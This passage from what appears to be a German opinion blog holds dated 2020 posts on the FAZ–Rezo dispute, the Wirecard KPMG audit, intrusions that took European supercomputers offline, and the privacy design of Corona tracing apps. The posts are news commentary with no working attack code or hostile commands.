Leute, Rezo ist ein Fuzzy auf Youtube. Die FAZ bildet sich ein, ein Leitmedium zu sein, und in dem besagten Video fallen ein paar echt fremschämwürdige Sprüche ala "der Jasper von Altenbockum hat ja mehr für den Journalismus in Deutschland getan als Rezo je leisten können wird". Ach? Ist das so, ja? Wann genau soll das gewesen sein? Mir ist der noch nie positiv oder auch nur neutral aufgefallen. Ich meine, gucken wir doch mal kurz! Die arme Vorratsdatenspeicherung ist Opfer vom fiesen Übeltäter Snowden geworden. Oder wie wäre es mit Das ZDF ist in russischer Hand! Oder vielleicht doch lieber wir brauchen atomare Abschreckung gegen DEN RUSSEN, um die arme unschuldige Ukraine an den Westen anzuschließen? Nicht euer Geschmack? Einen hab ich noch: Die Opposition droht bei der BND-Affäre zur "innerparlamentaischen Pegida" zu werden. Was hatte die Opposition noch gleich zu tun gewagt? Na sie dachten in ihrem jugendlichen Leichtsinn, man könnte Geheimdienste kontrollieren, und dachten laut über einen Untersuchungsausschuss nach. In den Hirnwindungen eines transatlantischen Betonkopfes wie Altenbockum kommt das praktisch einem Hochverrat gleich!
Ich meine, man muss den ja verstehen. Der sah sich kurzerhand von Jan Fleischhauer (der Anreißer reicht, ihr müsst nicht das ganze Video gucken) rechts überholt, und die hatten auch noch viel mehr Reichweite! Was hätte er denn da tun sollen?!
Aber es geht hier nicht um Jasper von Altenbockum. Auch nicht darum, dass die FAZ ernsthaft jemanden vorschickt, um den auch noch öffentlich zu verteidigen, und seine Verdienste für den Journalismus in Deutschland (ich erbrach mich spontan ein bisschen in meinen Mund, als ich die Zeile kam) zu loben. Nein. Es geht darum, dass sie auf Kritik nicht etwa mit "wir geloben Besserung" reagieren, sondern mit Rabulistik. Was passiert denn, wenn wir ihnen alle ihre Punkte glauben? Dann haben sie erfolgreich argumentiert, dass andere Zeitungen noch schlimmer sind als sie.
Und das, meine lieben Leser, ist in meinen Augen der Todesstoß.
Schlimmer als keine Integrität haben ist es, Integrität nicht mal als Anspruch an sich selbst zu haben.
Wenn die FAZ hier öffentlich argumentiert, der Rezo habe ja auch ähnliche Fehler wie sie gemacht, dann geben sie damit öffentlich zu, was Rezo behauptet hatte: Dass sie gar keine höheren Ansprüche als irgendwelche dahergelaufenen Youtuber haben. Mit anderen Worten: Sie bestätigen, was Rezo ihnen vorgeworfen hatte.
Ich finde es nicht schlimm, von Rezo vorgeführt zu bekommen, wie Transparenz bei Quellen und Methoden aussieht. Dass die FAZ da Nachhilfe braucht, belegen sie seit Jahren immer und immer wieder. Den Politik- und Wirtschaftsteil der FAZ konnte man schon immer in der Pfeife rauchen. Das Feuilleton war was denen ihren Wert gab, und seit Frank Schirrmacher tot ist, hat die FAZ nicht mal mehr das.
Während ihr hier diskutiert, ob Rezo ein satisfaktionsfähiger Bote für die schlechten Nachrichten sind, die seit Jahren jeder sehen kann, der die Augen aufmacht, möchte ich mal kurz darauf hinweisen, was Journalismus früher mal bedeutet hat. Journalismus hieß mal, dass man vorher ausreichend recherchiert und prüft und gegenprüft, dass man nie mit Falschbehauptungen erwischt wird, weil die bei den Prüfungen erkannt und entfernt wurden. Die Frage, wie die FAZ jetzt damit umgehen soll, dass Rezo ihnen ihre Schlamperei vorwirft, ist also schon einen Schritt zuviel. Die eigentliche Frage hätte sein müssen, wieso es Rezo überhaupt schaffen konnte, bei der FAZ so viel Pfusch zu finden.
So und jetzt warte ich auf die "ja aber der Fefe hat ja auch schon Fehler gemacht"-Fremschämtweets. Gute Nacht, Deutschland.

Thu Jun 11 2020

[l] Erinnert ihr euch noch an das CDU-Video von Rezo? Wie die CDU dann irgendeinen völlig unbekannten Pseudo-Jugendlichen aus dem Statisten-Mietservice zauberte, um "glaubwürdig" antworten zu können? Und dann ein "Gegen-Video" produzierte, was so fremdschämpeinlich war, dass es die Sache bestätigt und sogar noch schlimmer gemacht hat?
Nun, die FAZ sagt "hold my beer"! *fremschäm*
Immerhin hatte die CDU soviel Selbstreflektion, ihren Auffahrunfall von einem Video lieber zurückzuhalten. Das hätte die FAZ vielleicht auch tun sollen.

Tue May 19 2020

[l] Microsoft hat Berlins Datenschutzbeauftragen abgemahnt, weil der vor Teams und Skype gewarnt hatte. Sieht so aus als ist der Datenschutzbeauftragte auch sofort eingeknickt und hat das beanstandete Dokument entfernt...?!
Dass Microsoft sich so aufführt, überrascht glaube ich niemanden mehr. Aber dass der Datenschützer sofort die Segel streicht, das irritiert mich jetzt schon ein bisschen. Mit der Empfehlung haben die schließlich ihren Job gemacht. Genau das ist ihre Aufgabe!

Thu May 14 2020

[l] Exploit-Broker Zerodium will keine Apple-Exploits mehr kaufen. Da gibt es einfach zu viele, das hat den Markt kaputtgemacht.

Wed May 13 2020

[l] Leserbrief:
seit Ende letzter Woche haben große HPC-Zentren in Deutschland sowie mindestens eines im Ausland (UK) ihre Supercomputer offline genommen. Gefühlt bekomme ich jeden Tag eine neue Beschwerde von Forscherkollegen weil sie plötzlich nicht mehr rechnen können.
Stuttgart: Maschine wegen "Security Incident" down, http://websrv.hlrs.de/cgi-bin/hwwweather
Archer (UK): http://www.archer.ac.uk/status/
"Due to a security exploitation on the ARCHER login nodes, the decision has been taken to disable access to ARCHER while further investigations take place."
Bei Jülich steht nichts auf der Webseite, ist aber down. Barcelona soll es laut Kollegen aus Polen auch getroffen haben.
Ich habe mal rumgefragt und einer aus meiner Arbeitsgruppe der Leute kennt die Leute kennen hat mir folgendes aus Jülich weitergeleitet:
A backdoor was identified on several of our HPC systems.
Da sind wohl sehr viele Leute unruhig, weil: Verbreitungsweg unbekannt. Und sehr, sehr viele Leute können gerade nicht forschen.
Da merkt man mal, wieviel Forschung heutzutage Rechenzeit auf Supercomputern braucht.
Update: Ein Leser vermutet, dass Geheimdienste nach Corona-Impfstoff-Forschungsdaten suchen.
Ein anderer Leser berichtet:
also ich habe diverse Jahre solche Computer gebaut und auch upgraded und gewartet - wodurch ich öfters mal derjenige war, der sie offline genommen hat. Und zwar queerbeet an Unis, RZs, Instituten und auch Firmen in Europa.
... nun, was soll ich sagen. Habe häufig gehört: "ist ganz gut wenn das Ding mal aus ist - dann haben die Leute Zeit nachzudenken was gerechnet wird und warum"
gefolgt von Erklärungen wie:
... in einigen Teams/Lehrstühlen/Häusern gilt als wichtig/produktiv/erfolgreich wessen Name ständig ständig in den Job Queues zu sehen ist.
... einige Teams/Lehrstühle/Häuser verlieren ihr Rechenzeitkontigent auf Computer XYZ, wenn sie es nicht nutzen.
... der Computer / das RZ verliert sein Stromkontigent, wenn er es nicht genutzt wird.
... das Nachfolgesystem wird kleiner wenn die Last unter 100% ist.
Denke Du kannst dir den Irrsinn ausmalen, der sowas bewirkt.
Wieviel Strom auf diese Weise sinnlos verheizt wird und wieviel Rechenkapazität sinnlos installiert wird? ... also die Frage deprimiert genauso wie alle Fragen bezgl. unseres globalen Umweltproblems.
Ist alles "wenig" relativ zu Militär, Automobilen, Flugzeugen, ..., Klimaanlagen, ... und dennoch moralisch kein Stück besser.
Update: Ein anderer Leser fragt, ob das vielleicht mit der Salt-Lücke zu tun hat.
Update: Mehrere Rechenzentren haben intern die Losung ausgegeben, dass man nach setuid-Binaries in /etc/fonts/.fonts und /etc/fonts/.low gucken soll. Ich finde solche Ratschläge immer nicht hilfreich, weil das auf die Payload abhebt, nicht die Lücke. Über die Lücke hätte man auch eine andere Payload ausrollen können. Die Leute sind jetzt alle dabei, wild nach diesen Dateien zu gucken und dann die Systeme neu aufzusetzen. Wenn ihr nicht vorher auch die Lücke zugemacht habt, dann habt ihr dieselben Leute nächste Woche wieder auf den Rechnern.

Wed May 6 2020

[l] Liebe Leser, ich habe schlechte Nachrichten. In Schweden ist die Zombieapokalypse ausgebrochen und keiner hat es gemerkt. Naja, nicht ganz gar keiner. Ein paar Zombiejäger aus Deutschland haben es gemerkt und sich mit ihrem Einsatz-SUV auf den Weg gemacht. Die sind an der schwedischen Grenze kontrolliert wurden und dabei fielen den Grenzern 16 illegale Waffen in die Hände. Der Artikel hat ein Foto. Wir reden hier von mehreren Armbrüsten. Ich kann da ja nur sagen: Amateure. Zombiejäger müssen immer Melee-Waffen als Fallback mitbringen, eine anständige Axt oder ein Schwert oder ein Baseballschläger oder so. Das weiß doch jeder!
Hier ist eine Meldung auf schwedisch, da sieht man noch ein beschlagnahmtes Gewehr.

Tue Apr 28 2020

[l] Der KPMG-Bericht zu Wirecard ist draußen. KPMG steht ja, viele von euch werden das wissen, für "Keiner Prüft Mehr Genau".
Es ist daher ausgesprochen bemerkenswert, dass Wirecard offenbar selbst KPMGs "Prüfung" zu riskant erschien. Ihr müsst nicht das ganze Ding lesen, aber 1.2.1.6 (Whistleblower standen Schlange, um KPMG kompromittierende Materialen zu Wirecard zuzustecken) und 1.2.1.7 (Wirecard war mit der Übergabe von Dokumenten systematisch im Verzug) lohnen sich, und das Money Quote ist in 1.3.1.1.2 ("Ergebnisse der Untersuchungshandlungen"):
Hinsichtlich der Höhe und Existenz der Umsatzerlöse aus den TPA-Geschäftsbeziehungen zwischen der Cardsystems Middle East, der Wirecard UK & Ireland sowie der Wirecard Technologies und den jeweils relevanten TPA-Partnern kann KPMG als Ergebnis der durchgeführten forensisch geprägten Untersuchungshandlungen in Bezug auf den Untersuchungszeitraum 2016 bis 2018 weder eine Aussage treffen, dass die Umsatzerlöse existieren und der Höhe nach korrekt sind noch die Aussage treffen, dass die Umsatzerlöse nicht existent und in der Höhe nicht korrekt sind. Insoweit liegt ein Untersuchungshemmnis vor.
KPMG lehnt sich hier rückwärts über die Stuhllehne, um das offensichtliche Ergebnis als Doppelnegativ mit angedeutetem Konjunktiv zu formulieren. Mehr konnten sie für ihren Kunden nicht tun. Wow. Was Prüfberichte von Wirtschaftsprüfern angeht würde ich das mal als Totalschaden für Wirecard werten.
Ich meine, wenn du KPMG einstellst, um den Verdacht von Bilanzfälschungen zu entkräften, und KPMG sagt dann: Äh, tja, wir konnten da wirklich keine Umsatzerlöse finden! Die Vorwürfe gegen Wirecard waren, wir erinnern uns:
Die britische Zeitung hatte vergangene Woche unter Berufung auf interne Dokumente von Wirecard berichtet, dass der Konzern bei Auslandstöchtern in Dubai und Irland Umsatz und Gewinn künstlich aufgebläht habe.
Und KPMG sagt jetzt: Wir konnten keine Belege für die bilanzierten Umsatzerlöse finden. Die bestätigen also die Vorwürfe! Formulieren es aber so, als ob die Sache damit jetzt halt nicht zu klären sei. Doch, damit ist die Sache geklärt. Wirecard hat in ihrer Bilanz Dinge behauptet, die eine professionelle forensische Analyse der Daten nicht bestätigen konnten.
Update: Wirecard versucht daraus jetzt Kapital zu schlagen:
Der Zahlungsdienstleister Wirecard sieht sich durch die KPMG-Sonderprüfung wegen Vorwürfen der Bilanzmanipulation weiter entlastet. In den Prüfbereichen hätten sich für die Jahre 2016 bis 2018 nach wie vor keine substanziellen Feststellungen ergeben, die Korrekturen erforderlich gemacht hätten, teilte der Dax-Konzern am Dienstag mit.
Soll das ein Witz sein?!?
Update: Ein Leser sendet dazu diesen Tagesspiegel-Artikel aus dem Januar ein, mit dem Hinweis, dass die anderen "Wirtschaftsprüfer" auch nicht besser sind.

Thu Apr 23 2020

[l] Rezo hat ein neues Video gemacht, diesmal geht es um Abitur und das Öffnen der Schulen.
Spoiler: Rezo ist nicht einverstanden mit der Idee, die Schulen wieder zu öffnen.

Wed Apr 22 2020

[l] Lasst euch übrigens von den App-Diskussionen nicht von der eigentlichen Kernfrage ablenken, nämlich dass die Datenerhebung und -verwaltung der zuständigen Behörden im Moment absolut unzureichend ist. Pavel hatte da mal ein paar Kurven gemacht und festgestellt, dass die Daten weitgehend unbrauchbar sind. Er hat da eine künstliche Sinuswelle drübergelegt, um ein einigermaßen verwendbares Signal zu kriegen. Die Sinuswelle hat ausgeglichen, dass es in den Daten ein massives Hoch- und Runter im Wochentakt gibt. Da das Virus sich ja wahrscheinlich eher nicht an christliche Traditionen hält, wird das wohl ein Artefakt der Datenerhebung und -verarbeitung sein.
Money Quote des aktuellen Rants:
Wo bleiben Antworten auf die Frage, wo sich die Leute trotz Lockdown noch immer anstecken? Wie können wir über Lockerungen [reden], wenn wir offenbar keine Ahnung haben, was die Hauptinfektionssituationen sind?
Wie wollen wir die Lockerungen managen, wenn wir nach wie vor kein zeitnahes Berichtswesen haben? Statt über Apps zu fabulieren und zu streiten, hätte man längst die Datenerhebung und -verarbeitung der Gesundheitsämter verbessern können.
Gute Fragen, Pavel!
Update: Leserbrief dazu:
Tja, da ich in der "glücklichen" Situation bin, für unser zuständiges Gesundheitsamt genau eine solche Lösung als DB bzw Workflow abzubilden, kann ich dir nur mitteilen, das es KEINE Lösungen von Bund und Ländern gibt.
Die sind alle, wie wir, auf sich alleine gestellt.
Was im übrigen sehr viel Spass macht, da in den ersten Wochen andauernd im Tagestakt Änderungen durch das RKI kamen,
Verbessern an der Situation kann nur die jeweilige lokale IT und da sieht es flächendeckend überwiegend eher mau aus.
Aus eigener Erfahrung kann ich dir mitteilen, das überwiegend Excellisten zum Einsatz kommen, Software zur Erfassung und Verwaltung der Fälle ist eher rar gesät und immer Eigeninitiative.
Da willste doch losgehen und die CDU wählen, die für diese Zustände verantwortlich ist!!1!

Tue Apr 21 2020

[l] Was mir übrigens viel mehr Sorgen macht als dass die in einer App den Datenschutz versehentlich verkacken?
Dass sie ihn absichtlich verkacken bzw. gar nicht erst mitbestellen.
Hessens Covid-19-Krisenstab nutzt bald Software des US-Unternehmens Palantir, um den Überblick über die Corona-Krise zu behalten.
Ja super! Ausgerechnet Palantir!
Das ist jetzt wahrscheinlich nicht so übel wie es klingt, weil auch Palantir nicht zaubern kann. Der kann nur die Daten auswerten, die man da reinschiebt. Allerdings steht halt zu befürchten, dass die Politik gerade im Hühnerstallmodus fährt und da alles reinpackt, was sie in die Krallen kriegen können. Inklusive Funkzellendaten.
Das ist übrigens nicht der erste Kontakt von Hessen und Palantir. (Bisschen Kontext zu Palantir)
Update: In Hessen regiert seit gefühlt Jahrzehnten die CDU durch, mit so Lichtfiguren wie Volker Bouffier und Roland Koch. Hessen war auch das Bundesland, das Steuerfahnder von einem Psychiater dienstunfähig schreiben ließen, weil die ihre Arbeit gemacht hatten. Und das ist nicht gut für die Wirtschaft, wenn den Bonzen jemand beim Steuerhinterziehen im Weg steht. Woher sollen dann die Parteispenden für die CDU kommen, wenn das Finanzamt diese Kohle hat?
[l] Hey Fefe, wieso macht man für die Coronadaten nicht einfach echtes P2P wie bei Bittorrent?
Bittorrent funktioniert so, dass du vorher weißt, welche Datei du kriegst. In der torrent-Datei oder dem Magnet-Link steht der Hash der Daten drin. Du weißt, ob du die richtigen Daten gekriegt hast, weil der Hash sonst nicht stimmt. Bittorrent hat da einen schlauen Kniff namens Merkle Tree am Start, um auch schon einzelne falsche Fragmente erkennen zu können und nicht erst am Ende merkt, dass der Download für die Tonne war. Und selbst damit sind die Probleme noch nicht gelöst.
Wenn dich jemand ärgern will, announced er einfach öffentlich, er habe Segment 23, und schickt dir dann halt kaputte Daten. Wenn das genügend viele Leute machen, dann denkt der Bittorrent-Client immer, da war halt das Netz gerade kaputt, und versucht es beim selben Sender nochmal. Und natürlich kommt es auch vor, dass für einige Segmente gar keiner online ist, der die hat. Dann hängt euer Torrent halt ewig.
So und jetzt kommt bei den Covid-Daten dazu, dass die dynamisch sind. Da fallen ständig welche weg und an anderer Stelle kommen neue dazu. Woher weißt du als Client, dass die Daten OK sind, die du gerade kriegst? Da müsste man dann irgendwas mit Krypto-Signaturen machen, und der Client müsste die Signaturen prüfen können, d.h. die müssten dann von "der Behörde" signiert sein, damit es nur einen Signierer gibt und man den Public Key von dem halt in die App packen kann. Wenn man das so macht, hat man ein sogenanntes Revocation-Problem, falls der Key abhanden kommt.
Aber nehmen wir mal an, das sei alles gelöst.
Dein Telefon müsste jetzt die ganze Zeit online sein, um seine Fragmente anzubieten. Nehmen wir mal an, man nimmt Bittorrent-Tech wie eine distributed hash table, um das zuständige Gerät zu einem Fragment findbar zu machen.
Das ist schon im Bittorrent für die Raubkopierer Scheiße, weil es heißt, dass ein Abmahnanwalt die IP finden kann. Wenn jeder nur seine eigenen Fragmente hostet, dann ist das noch schlimmer. Dann findet man nicht nur raus, wer teilnimmt, sondern man findet die aktuelle IP zu einem gegebenen Fragment, und weil die jetzt gerade online sein muss, damit ich da Tokendaten abholen kann, kann ich auch eine Geolokalisierung machen und sehen wo das Gerät gerade grob ist. Das sind alles Daten, die man nicht rausrücken will.
Ich will jetzt nicht behaupten, dass da gar nichts geht, aber das ist bei weitem nicht so ein Selbstläufer, wie der eine oder andere anzunehmen scheint.
Übrigens, am Rande. Wenn ihr euch mal die DP-3T-Dokumente anguckt, dann werdet ihr sehen, dass das recht nahe an dem Konzept war, das ich hier als Idee eines Kumpels präsentiert habe. Das lag jetzt nicht daran, dass mein Kumpel sich deren Proposal angeguckt hat, sondern dass das halt das "naheliegende" Verfahren ist. Also für Leute, die hauptberuflich Krypto-Protokolle machen.
Ich sagte ja schon in meinem initialen Beitrag zu Corona-Apps, dass DP-3T aussieht, als hätten da Leute dran gearbeitet, denen Datenschutz wichtig ist. Aber wie dort auch gesagt: Da gibt es noch genügend andere Dinge, die man in so einer App verkacken kann.
Ich weiß nicht, ob ihr mal Bergwandern gemacht habt. Da wandert man stundenlang über mehr oder wenige einsame Bergwege, und man macht sich die ganze Zeit vor, man sei so gut wie da. Nur noch um die Ecke da, dann muss da die Hütte sein, zu der wir wollten. Bergwandern kann man nur machen, wenn man sich entweder selbst bescheißen kann, dass man gleich da ist, oder einen Weg gefunden hat, die früher oder später einsetzenden Schmerzen zu ignorieren. Beim Programmieren ist das leider genau so. Wenn daher jemand kommt und sagt, er hackt mal eben ne App, dann könnt ihr euch sicher sein, dass der zur ersten Gruppe gehört. Der redet sich gerade selbst ein, er sei so gut wie da. Weil er genau weiß, dass er sonst auf halbem Weg scheitern wird und aufgeben muss. Glaubt so jemandem kein Wort.
Die "ich spür keinen Schmerz"-Methode ist auch sehr verbreitet in der IT. Das sind die Leute, die sich zwölf Dutzend Libraries und Frameworks und Datenbanken und andere Abhängigkeiten in ihre Projekt reinholen und dann "schnell fertig" sind. Nur dass die Schmerzen für die ganzen beweglichen Teile halt auf den Endanwender abgewälzt werden, und auf den, der den Scheiß dann warten soll.
Eine ordentliche App braucht ihre Zeit. Sowohl im Design der Protokolle als auch in der Umsetzung, dem Testing, und so weiter. Ich weiß: Ihr wisst das alle. Ich wollte es nur mal wieder angesagt haben. Weil auch IT-Anwender sich gerne Dinge einreden, die nicht der Realität entsprechen.
[l] Hey, Covid ist doch so gut wie unter Kontrolle! Die Steigerungsraten flachen sich ab, die Isolation hat funktioniert! Dann können wir damit doch aufhören, oder?
Nun, Singapur hat das Szenario mal für uns ausprobiert. Das Ergebnis ist, wie ohne Herdenimmunität und Impfung eigentlich klar war: Die Fallzahlen schnellen wieder nach oben.
Ich fürchte, wir werden noch länger Isolation fahren müssen. Auch wenn heute angeblich die ersten Elektromärkte wieder aufgemacht haben.

Mon Apr 20 2020

[l] Ich weiß nicht, ob ihr den Clusterfuck mitgekriegt, der da gerade um Corona-Apps stattfindet. Das Verkacken auf allen Seiten erreicht inzwischen geradezu biblische Ausmaße. Die müssen sich nicht hinter dem BER verstecken.
Es ging damit los, dass jemand meinte: Hey, wir brauchen eine App.
Da war die Sache eigentlich schon klar.
Ich weiß nicht, wer das war, aber ich vermute einen bekloppten Big-Data-Sprallo, der mal eine Familienpackung KI-in-der-Cloud-Bullshit an den Steuerzahler verkaufen wollte.
Ich hörte das Gerücht, dass es Hans-Christian Boos war. Ich hatte mit dem noch nie was zu tun, insofern kann ich nicht einschätzen, was der kann. Aber seine Selbstdarstellung checkt einmal alle Boxen. Da muss ich echt aktiv meinen Würgreiz unterdrücken, wenn ich das lese. Oh und er ist im Digitalrat der Bundesregierung. Das spräche gegen die Kompetenzvermutung. Aber wer weiß, ich kenn den nicht. Und ich hörte, der sei eigentlich schon eher einer der Guten, nur halt irgendwie komisch sozialisiert mit seinem Big-Data-KI-in-der-Cloud-Scheiß.
Aber gut, ignorieren wir mal, aus welcher Ecke das kommt. Ergibt das denn inhaltlich Sinn, wenn wir die Bewegungsdaten tracken?
Naja. Kommt drauf an. Man könnte sich da Szenarien vorstellen, wo sagen wir mal jemand merkt, dass er infiziert ist, und man dann bei den Handydaten mal guckt, mit wem der so Kontakt hatte in den letzten zwei Wochen. Dafür würde es reichen, wenn dein Handy ein Profil speichert und nach zwei Wochen immer rausaltert. Man will ja in der Situation auch selber Menschen retten, an deren Ansteckung man beteiligt war, insofern würde es reichen, wenn das freiwillig stattfindet und die Daten überhaupt nur entschlüsselt werden, wenn der Eigentümer des Geräts zustimmt.
Aber, wenn ihr mal genau hinguckt: Das ist nicht das Modell, um das es hier geht. Die Debatte geht darum, ob man die Daten zentral (d.h. auf einem Server der EU) speichert oder dezentral (jedes Land hat eigene Server). Kein Mensch redet von einer Variante, wo die Daten auf deinem Handy bleiben.
Also muss ein anderes Szenario gemeint sein. Wenn man da mal ein bisschen guckt, findet man nur so Big-Data-Allgemeinplätze und Forschungsinteresse, die so neutral wie Strömungsmechanik in Gewässern formuliert werden.
Aber nehmen wir mal an, das hätte alles Hand und Fuß.
Grundsätzlich klingt dezentral ja schonmal besser als zentral. Es gab da einen Vorschlag für eine Plattform namens "PEPP-PT" (was für ein bekloppter Name!), wo die Daten landen. Und da gab es einen Untervorschlag namens "DP-3T", der zumindest von den Zieldefinitionen her klang, als wäre da jemand am Datenschutz interessiert. Der verschwand dann plötzlich vor ein paar Tagen von der Webseite von PEPP-PT, und die Leute, die den eingereicht hatten, waren anscheinend genau so überrascht wie die Beobachter von außen. Die sprangen daraufhin von dem Projekt ab, wie auch das Helmholtz-Zentrum. Und jetzt stehen alle vor den Trümmern und keiner will es gewesen sein.
Fakt ist, dass alle Vorschläge für eine App, die Bewegungsdaten sammelt, sehr kritisch gesehen werden müssen, weil das Missbrauchspotential so enorm ist.
Auf der anderen Seite sehe ich aber auch überhaupt keinen Anlass für die Annahme, dass die den Rest hingekriegt hätten. So eine App hätte ja noch andere Parameter. Wie sie sich z.B. auf die Akkulaufzeit auswirkt, wieviel Daten das verschickt, wer für die Übertragung der Daten zahlen soll, wer den Speicher betreibt, etc. Und so eine App wird ja auch gerne mal vom OS gekillt, wenn sie keine interaktive Komponente hat und der Benutzer gerade andere Dinge tun will, oder wenn sie zuviel Strom verbraucht hat.
Kurz gesagt: Hängt euch mal nicht am Datenschutz auf. Da kann man noch viel mehr Dinge verkacken. Und so wie es im Moment aussieht ist das so ein fraktal verkacktes Ding wie BER. Egal wo du konkret hinschaust: alles ist vergiftet.
Was ist denn z.B. wenn jemand an ein paar alten Leuten mit Vorbelastung vorbei geht, die aber kein Handy haben? Oder deren Handy ist aus weil der Akku alle ist? Oder die haben noch ein Uralt-Gerät ohne Apps und Bluetooth?
Ich persönlich halte die ganze Debatte ja für Ablenkung. Damit ihr das Gefühl habt, es geschieht was. Denn wenn ihr nicht das Gefühl habt, dass was passiert, stellt ihr möglicherweise den Rest des Maßnahmenkatalogs in Frage, und das wäre Scheiße für alle. Daher simulieren sie jetzt vor euren Augen ein neues Maut-Debakel.
Gehen Sie weiter. Hier gibt es nichts zu sehen.
Nee, warte, gehen Sie nicht weiter! Bleiben Sie drinnen!
Update: Ihr wisst, dass ich Recht habe, wenn sie das jetzt nach Strich und Faden verkacken, und dann sagen, die Datenschutzanforderungen seien Schuld gewesen. Dann wisst ihr, dass sie euch dreist ins Gesicht lügen.
Update: Das ist auch eine gute Gelegenheit, nochmal die CCC-Prüfsteine für solche Apps zu verlinken.
Update: Für die Nicht-Techniker unter euch: Habt ihr schonmal Bluetooth-Discovery in eurer Wohnung gemacht und Drucker oder Fernseher des Nachbarn gesehen? Das Problem wird auch diese App haben. Das sorgt dann für eine Tonne False Positives in der Datenbank und könnte dem ganzen Projekt das Genick brechen.
Update: Ein Leser hat mich noch auf diesen offenen Brief hingewiesen, den einmal alle Forscher mit Rang und Namen in dem Bereich unterschrieben haben. Inhalt:
Thus, solutions which allow reconstructing invasive information about the population should be rejected without further discussion.
Update: Es gibt da noch ein paar Gerüchte gerade. Eines ist, dass die Bundesregierung erkannt hat, dass das nur mit einem Vertrauen-Sie-Uns-Siegel der Datenschützer von der Bevölkerung angenommen wird, und haben daher angesagt, dass das von Datenschützern auditiert werden muss. Die Datenschützer haben daraufhin gesagt, dass sie nur Lösungen auf Compliance auditieren können, wo die Daten zentral (oder von mir aus auf mehrere Locations verteilt aber jedenfalls nicht P2P!) lagern. Und damit fielen dann die P2P-Ansätze direkt raus. Im Übrigen ist auch völlig unklar, was eigentlich "dezentral" bedeutet. Jedes Land macht was eigenes? Verschiedene Organisationen haben eigene Server? Ganz eigene Software vielleicht? Nichts genaues weiß man nicht!
Ich bin mir ja sicher, dass das überhaupt nur mit Blockchain lösbar ist. Was das für Forschungsmittel freimachen würde!!1! *sabber*
Update: Das PEPP-PT-Konzept findet ihr hier, falls ihr mal nach den besonders schlimmen Stellen suchen wollt. PEPP-PT selbst ist anscheinend ein Fraunhofer-Forschungsmittel-Acquise-Projekt. Die haben erstmal alle Institute mit reingeholt, die nicht bei drei auf den Bäumen waren. Ich weiß ja nicht, wie es euch geht, aber bei Fraunhofer werde ich hellhörig. Besonders bei einem Projekt, wo es um meine Privatsphäre geht. Und wenn ich dann "vertrauen Sie uns" höre. Nein, Fraunhofer. Tue ich nicht.

Tue Apr 14 2020

[l] Es gibt gerade mal wieder eine tolle Medienkompetenzübung. Und zwar geht es um eine Anwältin, die vor dem Verfassungsgericht einen Eilantrag gegen die Coronamaßnahmen eingereicht hatte, der dann abgewiesen wurde.
Die Rhein-Neckar-Zeitung berichtete. Die berichten:
"Sie hat einen sehr verwirrten Eindruck gemacht", begründete ein Polizeisprecher das Vorgehen gegenüber der RNZ.
Wie, watt? Systemkritiker kommen jetzt schon in die Psychiatrie?! Wo sind wir hier, Russland? China?!? KenFM ist am Ball (und die Kommentare unter dem Video sind Comedy Gold)!
Die Berichterstattung zielt zu diesem Zeitpunkt noch weitgehend auf ihre Verfassungsbeschwerde. Nur in einem Nebensatz deutet sich an, dass die Polizei vielleicht Gründe gehabt haben könnte:
Am Samstag hatte die Rechtsanwältin auf ihrer Webseite eine "Auferstehungsverordnung" veröffentlicht und den Shutdown für beendet erklärt.
Bei den Investigativjournalisten von T-Online (nein, wirklich!) findet man ein paar mehr sachdienliche Hinweise.
Kurz danach hielt sie auf der Straße Autofahrer an und bat sie, die Polizei zu rufen.
In einer Tondatei, die sie offenbar ihrer Schwester gesendet hatte und die auf Telegram veröffentlicht wurde, heißt es: Sie sei auf die Straße gerannt, weil sie sich durch zwei mutmaßliche Killer vor ihrer Tür bedroht gefühlt habe. Sie habe die Insassen eines Autos um Hilfe gebeten.
Nun, äh, was soll ich euch sagen. Finde ich erstmal nicht völlig absurd, wenn die Polizei unter solchen Umständen zu dem Schluss kommt, dass die möglicherweise Hilfe braucht.
Aus ihrer Psychiatrischen Unterbringung berichtet sie übrigens, dass sie dort "vor ganz dunklen Mächten" in Sicherheit sei, weil Besuche nicht möglich sind.
Ich finde das gut, wenn der Staat seit der Mollath-Nummer nicht mehr einfach Leute in der forensischen Psychiatrie wegsperren kann. Aber mal unter uns: Regt euch über die geltenden Polizeigesetze auf, nicht über diesen Einzelfall. Das bayerische Versammlungsrecht lässt in China die Behörden vor Neid erblassen. Die Chinesen müssen sich noch schlechte Ausreden ausdenken, wenn sie jemanden unbefristet verschwinden lassen müssen!
[l] Wie schlimm ist die Lage? So schlimm: Frank und ich haben schnell noch eine Alternativlos-Covid-Sondersendung gemacht. Mit rekordverdächtigen zwei Gästen: Christiane Hütter und Rop Gonggrijp. Unter rekordverdächtigen Bedingungen: Remote-Schalte mit 4 Personen an 4 Orten. Mit rekordverdächtigem Handycap: Uns ist natürlich die Aufnahmetechnik und die Netzanbindung während der Sendung ein paar Mal um die Ohren geflogen, aber Frank, unser Held der Arbeit, hat das laut fluchend in zweiwöchiger manueller Fummelarbeit gerettet.
Oh, und noch mehr gute Nachrichten: Wir haben jetzt wieder Stereo, und die Teilnehmer kommen akustisch von verschiedenen Positionen. Ich finde, dass das das Hören deutlich entspannter macht.
Inhalt der Sendung ist natürlich Covid-19, allerdings mit zwei Hälften. In der ersten Hälfte erklärt uns die zu Psychologie in Schadensgroßlagen geforscht habende Christiane Hütter, was Phase ist. Und in der zweiten Hälfte haben wir den alten Freund der Sendung Rop Gonggrijp, der uns ~~erklärt, wie gut ihm sein ganzes Preppen geholfen hat~~ seine wunderbare Materialsammlung zu Covid-19 zeigt, damit auch ihr euch selbst helfen könnt und möglicherweise gelassener in die Zukunft blicken könnt, weil ihr gut vorbereitet seid.
Viel Spaß beim Hören und bleibt gesund!

Thu Apr 9 2020

[l] Die nächste Iteration des Corona-Handelskriegs ist da: Die Amis haben bei Philips 10000 Beatmungsgeräte geordert. Für je 3280 Dollar.
Philips hat nicht geliefert.
Jetzt haben sie einen neuen Deal mit den Amis gemacht. 43000 Beatmungsgeräte für ja 15000 Dollar.
Merkwürdigerweise finden die Amis das gar nicht mehr so gut, wenn es in die Richtung passiert.

Tue Apr 7 2020

[l] Fischers aktueller Kommentar ist über Pandemie-Einschränkungen. Und strotzt wie üblich nur so vor Money Quotes. Hier ist sein Absatz zur Frage der Mobilfunkdatennutzung:
